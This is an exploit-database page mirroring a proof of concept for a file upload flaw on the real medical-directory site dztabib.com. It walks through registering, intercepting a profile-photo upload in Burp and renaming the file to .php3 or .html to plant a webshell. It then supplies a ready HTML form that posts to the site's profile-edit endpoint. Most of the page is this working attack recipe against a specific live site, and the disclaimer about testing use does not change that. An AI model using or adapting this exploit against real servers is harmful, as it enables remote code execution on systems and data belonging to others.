Advertisement






www.dztabib.com File upload vunlerability Leads to webshell upload

CVE Category Price Severity
CVE-2021-24327 CWE-434 Not specified High
Author Risk Exploitation Type Date
Author not specified High Remote 2019-06-03
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060012

Below is a copy:

www.dztabib.com File upload vunlerability Leads to webshell upload
##########################################################################
#  Ttitle : www.dztabib.com File upload vunlerability Leads to webshell & HTML files upload 
#  Founder : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
#  Date : /02/06/2019
#  Home : Annaba ( Algeria )
#  Tested on : Linux ( Backbox )
##########################################################################


# PoC

 [ + ]  Register as user in the website

 [ + ]  Login to your account

 [ + ]  Go to this path  :https://www.dztabib.com/parametres

 [ + ]  Upload your evil file with jpeg extenction don't forget to intercept the request with burp or tamper data

then change the extenction into .Php3 or html after that forward the request

Example : https://www.dztabib.com/storage/photo_profil/bBuSUDVeBeHTg0OTusInIVCXYzUkpuB57laqzrEx.


---------------------------------------------------------------------

<!-- FIle upload poc -->
<html lang="en">
<head>
<title>FIle upload PoC</title>
<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">
<style>
button{border:2px solid #F00;border-radius:2px;}
input{border:2px solid #F00;border-radius:2px;width:100px;}
body .n00bi{font-family:'Iceland', cursive;color:green;text-shadow:2px 2px #F00;}
</style>
<script>
function alert_me(){
var Domain = "www.dztabib.com"
alert("Path of Evil file : \n" + Domain + "/storage/photo_profil/" + "[ Evil ]");
}
</script>
</head>
<body style="background-image:url(https://media.giphy.com/media/smzfl3E7a4iHK/giphy.gif);text-align:center" onload="alert_me()">
<div class="n00bi">
<header>
<h1> simple File upload form By Dj3Bb4rAn0n</h1>
</header>
</div><br>
<div class="content_img">
<article>
<img src="https://www.upload.ee/image/10006478/a.jpg" alt="I'm n00b :V" />
</article>
</div><br>
<form class="form-group" action="https://www.dztabib.com/edit/profile" method="post" enctype="multipart/form-data">
<input type="hidden" name="_token" value="2TDQZOjUU28MU9iuGrXbZm2p7RZkbkrcPTuw0M4S"> <!-- Change it with your token -->
<input type="hidden" name="_method" value="PUT">
    <input type="hidden" class="form-control" name="name" value="fuckyou" > 
    <input type="hidden" class="form-control" name="prenom" value="fuckyou" >
<input id="age" type="hidden" class="form-control" name="age" value="20" required autofocus>
    <input id="wilaya" type="hidden" class="form-control" name="wilaya" value="fuckyou" required autofocus>
    <input id="adresse" type="hidden" class="form-control" name="adresse" value="[email protected]" required autofocus> <!-- Change it with your email -->
    <input id="photo" type="file" class="form-control" name="photo" >
    <input id="email" type="hidden" class="form-control" name="email" value="[email protected]" required>
    <button type="submit" class="n00b">Submit the request</button>
</form>
</body>
</html>
--------------------------------------------------------------

Sh00tz To my PC

-------------------------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum